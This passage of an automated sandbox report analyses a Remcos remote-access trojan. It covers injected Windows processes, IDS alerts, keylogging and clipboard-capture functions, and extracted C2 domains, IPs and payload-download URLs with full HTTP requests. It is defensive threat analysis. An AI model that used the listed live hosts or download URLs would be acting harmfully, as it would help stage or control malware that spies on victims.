              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_00408847
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00407877 FindFirstFileW,FindNextFileW,15_2_00407877
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0044E8F9 FindFirstFileExA,15_2_0044E8F9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB6B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419B86
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD72
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0781F616 FindFirstFileExA,15_2_0781F616
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077D9564 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_077D9564
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077D8594 FindFirstFileW,FindNextFileW,15_2_077D8594
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077DA3BD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_077DA3BD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077ED03F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_077ED03F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077DD0A5 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_077DD0A5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077D9FAB __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_077D9FAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077DCA8F FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_077DCA8F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077EA8A3 FindFirstFileW,15_2_077EA8A3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077DC888 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_077DC888
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29137CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_29137CD2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49763 -> 103.186.117.159:56796
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49813 -> 103.186.117.159:13939
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49823 -> 103.186.117.159:56796
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49824 -> 103.186.117.159:13939
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49825 -> 103.186.117.159:56796
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49826 -> 103.186.117.159:13939
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49827 -> 103.186.117.159:56796
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49830 -> 103.186.117.159:13939
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49829 -> 103.186.117.159:56796
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49828 -> 103.186.117.159:13939
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49831 -> 103.186.117.159:56796
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1
              Source: Malware configuration extractorURLs: https://lightstone.ae/image/233_Selebzihtih
              Source: Malware configuration extractorURLs: pentester0.accesscam.org
              Source: Malware configuration extractorURLs: archived.zapto.org
              Source: Malware configuration extractorURLs: honeypotresearchteam.duckdns.org
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 103.186.117.159 ports 5,6,7,56796,13939,9
              Uses dynamic DNS services
              Source: unknownDNS query: name: honeypotresearchteam.duckdns.org
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6E4B8 InternetCheckConnectionA,0_2_02C6E4B8
              Source: global trafficTCP traffic: 192.168.2.9:49763 -> 103.186.117.159:56796
              Source: Joe Sandbox ViewIP Address: 13.107.136.10 13.107.136.10
              Source: Joe Sandbox ViewASN Name: CENTURYLINK-US-LEGACY-QWESTUS CENTURYLINK-US-LEGACY-QWESTUS
              Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49723 -> 13.107.136.10:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49746 -> 162.19.139.102:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49729 -> 13.107.136.10:443
              Source: global trafficHTTP traffic detected: GET /:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: alfanar01-my.sharepoint.com
              Source: global trafficHTTP traffic detected: GET /personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: alfanar01-my.sharepoint.comCookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEzLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2Q3NzQ2ZGY2NmVlODk4Nzc5MTI0YzAxMTEwNWZkZTJlZTgyZTI3NTUzNGMwNmMyMjBiOWNlZjQyNGMxNzNjMzAsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jZDc3NDZkZjY2ZWU4OTg3NzkxMjRjMDExMTA1ZmRlMmVlODJlMjc1NTM0YzA2YzIyMGI5Y2VmNDI0YzE3M2MzMCwxMzM3NzA3OTAzNDAwMDAwMDAsMCwxMzM3NzE2NTEzNDk3ODEzMTksMC4wLjAuMCwyNTgsOTE3NDIwNjMtZmNjYy00Y2JhLWIzNGItNjliZTU0ZTQ4NGU4LCwsZDE5NzY3YTEtNzBmOS1hMDAwLTcwZGMtNmI4OGUwYmM1NThkLGQxOTc2N2ExLTcwZjktYTAwMC03MGRjLTZiODhlMGJjNTU4ZCxMMEhrZGdUY3pVcTFOaGcwM2VZM2ZRLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxODk3NDksdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGlQNFZYR2cwTkFVRFJwaHJxS0ZTK1ZDM3RFT0dkTnVqeWhZaGRkNm4yMVJqVUxIYjVQUE9QQkY3SkgyczF3cWZtU0RrTWQzanV2My82RzlEWTRrdE9vbzQ0VnAvb085WE1iL2ExSnBJWVBieHFab3Z4bm9tSk5YVWYwK0Vwd3VHU2pzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJc0pMZEk0YlI2MXhFZjhvK242TmJZM0s0VmNXOEJ0Sk5MZzhpZEJIQVdFOVlFZVhKY3pZMk1OQkpHcElMRzcvczFRODVla09MUVVacjA5TmlnOUY4YlIxRi9FN1lQV1NZcmxEeHBjK0hwTVlnYkZ6cEREQjQyQnZBTnRhRUt0MEhTSS9CRElRMXg2Y2VHZ0EyQ29qTkhCOHhoVjJ2TzFOOVltaWdoSDVuZFZuUT09PC9TUD4=
              Source: global trafficHTTP traffic detected: GET /image/233_Selebzihtih HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lightstone.ae
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29156D42 recv,8_2_29156D42
              Source: global trafficHTTP traffic detected: GET /:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: alfanar01-my.sharepoint.com
              Source: global trafficHTTP traffic detected: GET /personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: alfanar01-my.sharepoint.comCookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEzLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2Q3NzQ2ZGY2NmVlODk4Nzc5MTI0YzAxMTEwNWZkZTJlZTgyZTI3NTUzNGMwNmMyMjBiOWNlZjQyNGMxNzNjMzAsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jZDc3NDZkZjY2ZWU4OTg3NzkxMjRjMDExMTA1ZmRlMmVlODJlMjc1NTM0YzA2YzIyMGI5Y2VmNDI0YzE3M2MzMCwxMzM3NzA3OTAzNDAwMDAwMDAsMCwxMzM3NzE2NTEzNDk3ODEzMTksMC4wLjAuMCwyNTgsOTE3NDIwNjMtZmNjYy00Y2JhLWIzNGItNjliZTU0ZTQ4NGU4LCwsZDE5NzY3YTEtNzBmOS1hMDAwLTcwZGMtNmI4OGUwYmM1NThkLGQxOTc2N2ExLTcwZjktYTAwMC03MGRjLTZiODhlMGJjNTU4ZCxMMEhrZGdUY3pVcTFOaGcwM2VZM2ZRLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxODk3NDksdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGlQNFZYR2cwTkFVRFJwaHJxS0ZTK1ZDM3RFT0dkTnVqeWhZaGRkNm4yMVJqVUxIYjVQUE9QQkY3SkgyczF3cWZtU0RrTWQzanV2My82RzlEWTRrdE9vbzQ0VnAvb085WE1iL2ExSnBJWVBieHFab3Z4bm9tSk5YVWYwK0Vwd3VHU2pzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJc0pMZEk0YlI2MXhFZjhvK242TmJZM0s0VmNXOEJ0Sk5MZzhpZEJIQVdFOVlFZVhKY3pZMk1OQkpHcElMRzcvczFRODVla09MUVVacjA5TmlnOUY4YlIxRi9FN1lQV1NZcmxEeHBjK0hwTVlnYkZ6cEREQjQyQnZBTnRhRUt0MEhTSS9CRElRMXg2Y2VHZ0EyQ29qTkhCOHhoVjJ2TzFOOVltaWdoSDVuZFZuUT09PC9TUD4=
              Source: global trafficHTTP traffic detected: GET /image/233_Selebzihtih HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lightstone.ae
              Source: global trafficDNS traffic detected: DNS query: alfanar01-my.sharepoint.com
              Source: global trafficDNS traffic detected: DNS query: lightstone.ae
              Source: global trafficDNS traffic detected: DNS query: pentester0.accesscam.org
              Source: global trafficDNS traffic detected: DNS query: archived.zapto.org
              Source: global trafficDNS traffic detected: DNS query: honeypotresearchteam.duckdns.org
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: SndVol.exe, colorcpl.exeString found in binary or memory: http://geoplugin.net/json.gp
              Source: SndVol.exe, 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: jlPBMMQbXC.exe, Selebzih.PIF.7.drString found in binary or memory: http://hydros.8k.com
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
              Source: jlPBMMQbXC.exe, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1638986421.000000007FB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
              Source: jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfanar01-my.sharepoint.com/
              Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000DA69000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlK
              Source: jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfanar01-my.sharepoint.com/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1Z
              Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfanar01-my.sharepoint.com:443/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQ
              Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.0000000000834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lightstone.ae/
              Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000DAA3000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000DA69000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lightstone.ae/image/233_Selebzihtih
              Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lightstone.ae/image/233_Selebzihtihv
              Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.0000000000802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lightstone.ae:443/image/233_SelebzihtihzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJ
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1491083792.000000000083E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spo.nel.measure.office.net/api/report?tenantId=91742063-fccc-4cba-b34b-69be54e484e8&desusert
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 13.107.136.10:443 -> 192.168.2.9:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.19.139.102:443 -> 192.168.2.9:49746 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2913A2F3 SetWindowsHookExA 0000000D,2913A2DF,000000008_2_2913A2F3
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914697B OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_2914697B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291468FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_291468FC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004168FC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077E7619 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_077E7619
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914697B OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_2914697B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2913A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,8_2_2913A41B
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
